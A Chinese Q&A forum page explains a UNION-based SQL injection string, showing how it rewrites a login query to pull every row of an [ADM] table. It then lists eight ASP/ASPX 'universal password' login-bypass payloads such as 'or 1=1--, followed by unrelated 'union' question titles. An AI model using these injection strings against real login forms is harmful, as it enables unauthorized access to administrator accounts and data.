1' union select * from [ADM] union select * from [ADM] where '1'='1

来源：百度知道编辑：UC知道时间：2024/06/30 02:40:16

什么意思解释下
提示下这个是个
注入语句

union就是联合的意思。把两标拼接起来。

当两表的结构或者所选择的字段相同时候才可以使用Union方法。否则会出错。
-----------------
那也要人家用了字符串拼接的SQL语句你这台才能用。用PROC注入不了的。
#######
打个比方
原始的SQL是
SELECT * FROM [ADM] WHERE USERID='ADMIN' AND PASSWORD = 'PASS'

你现在在ADMIN或者PASS的地方插入你的那个语句也就变成了
SELECT * FROM [ADM] WHERE USERID='ADMIN' AND PASSWORD = '1' union select * from [ADM] union select * from [ADM] where '1'='1'

前面那个SELECT * FROM [ADM] WHERE USERID='ADMIN' AND PASSWORD = '1' 肯定什么数据都不会出来的。
但是下面还有一句UNION
select * from [ADM] union select * from [ADM] where '1'='1'

而最后的1=1这个条件就是真，所以会把[ADM] 所有的数据都给抽出来。

asp aspx万能密码

1： "or "a"="a
2： ')or('a'='a
3：or 1=1--
4：'or 1=1--
5：a'or' 1=1--
6： "or 1=1--
7：'or'a'='a
8： "or"="a'=&#

1' union select * from [ADM] union select * from [ADM] where '1'='1 trade union IO1.1SE价格是多少? C++中“' must have class/struct/union type”是什么错误 c++union问题 SQL中 union问题 union language是什么啊 unity union 不同在哪儿？意大利歌曲 Se tu m'amt SQl语句的union问题